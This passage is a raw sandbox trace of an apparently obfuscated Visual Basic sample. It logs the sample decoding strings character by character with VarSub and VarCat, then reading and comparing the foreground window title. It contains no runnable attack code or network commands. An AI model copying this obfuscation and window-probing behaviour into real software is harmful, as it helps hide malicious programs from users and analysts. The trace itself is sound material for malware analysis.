out: lpWideCharStr=" ") returned 1 [0181.113] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.113] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.113] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.114] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.114] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.115] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.115] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.116] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.116] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.117] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.117] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.118] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.118] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.119] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.119] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.120] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.120] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.120] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.121] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.121] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.122] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.122] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.123] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.123] GetForegroundWindow () returned 0x20086 [0181.123] GetLastError () returned 0x0 [0181.123] SysStringLen (param_1=" ") returned 0xff [0181.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.123] SysStringLen (param_1=" ") returned 0xff [0181.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.123] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.124] GetLastError () returned 0x0 [0181.124] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.124] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.124] SysStringLen (param_1="Pr") returned 0x2 [0181.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0181.125] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0181.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.125] GetFocus () returned 0x0 [0181.125] lstrlenA (lpString="Pr") returned 2 [0181.125] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0181.125] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Pr") returned 2 [0181.125] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0181.126] GetFocus () returned 0x0 [0181.126] lstrcmpA (lpString1="Pr", lpString2="Pr") returned 0 [0181.126] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.126] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.126] GetFocus () returned 0x0 [0181.126] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0181.126] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0181.127] GetFocus () returned 0x0 [0181.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0181.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0181.127] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.127] VarBstrCmp (bstrLeft="Pr", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.128] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0181.128] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.129] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0181.129] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.130] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.130] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.131] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.131] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.132] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.133] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.133] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.134] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.134] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.135] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.135] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.135] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.136] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0181.136] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.137] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.137] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.138] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.138] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.139] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0181.139] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.140] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.140] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.140] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0181.141] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.141] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.142] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.142] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.143] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.143] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0181.143] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.144] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0181.144] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.145] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0181.145] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.146] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, 